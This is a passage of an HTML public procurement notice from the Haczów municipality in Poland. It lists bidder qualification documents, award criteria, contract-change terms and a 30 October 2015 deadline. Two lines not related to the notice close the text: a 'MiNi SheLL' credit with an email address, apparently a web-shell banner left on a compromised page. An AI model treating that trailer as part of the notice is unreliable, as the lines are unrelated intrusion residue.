a) wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - termin  płatności  faktury - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>) W przypadkach  przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą zamawiającego. Zmiana ta  ma być dokonana w drodze aneksu pisemnego  pod rygorem nieważności. Zmiany przewidziane w umowie mogą  być inicjowane przez Zamawiającego lub przez Wykonawcę. Zmiany o których mowa  mogą dotyczyć:
a) osób odpowiedzialnych  z ramienia Wykonawcy i Zamawiającego do  koordynowania prowadzonych usług, 
b) danych adresowych  wykonawcy, 
c)wystąpienia siły wyższej, przy czym za siłę wyższą uważa się wszystkie zdarzenia, jakich nie da się przewidzieć w chwili zawarcia umowy i na które żadna ze stron nie będzie miała wpływu,  w szczególności: działania wojenne, rozruchy, klęska żywiołowa,
Możliwa  jest   również zmiana  wysokości  wynagrodzenia  wykonawcy   w  przypadku zmiany stawki podatku VAT, wysokości  minimalnego  wynagrodzenia  za  pracę  ustalonego   na  podstawie  art. 2  ust 3-5  ustawy  z  dnia  10  października 2002 r.  o minimalnym  wynagrodzeniu  za  pracę, zasad  podlegania  ubezpieczeniom  społecznym  lub ubezpieczeniu  zdrowotnemu  lub  wysokości  stawki  składki  na  ubezpieczenia   społeczne  lub    zdrowotne pod  warunkiem ze  w.w  zmiany  będą  miały  wpływ  na koszty  wykonania  zamówienia  przez  wykonawcę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.haczow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Gminy Haczów , 36-213 Haczów  nr  573, pokój  nr  14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.10.2015 godzina 10:00, miejsce: Urząd  Gminy Haczów , 36-213 Haczów  nr  573, pokój  nr  1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com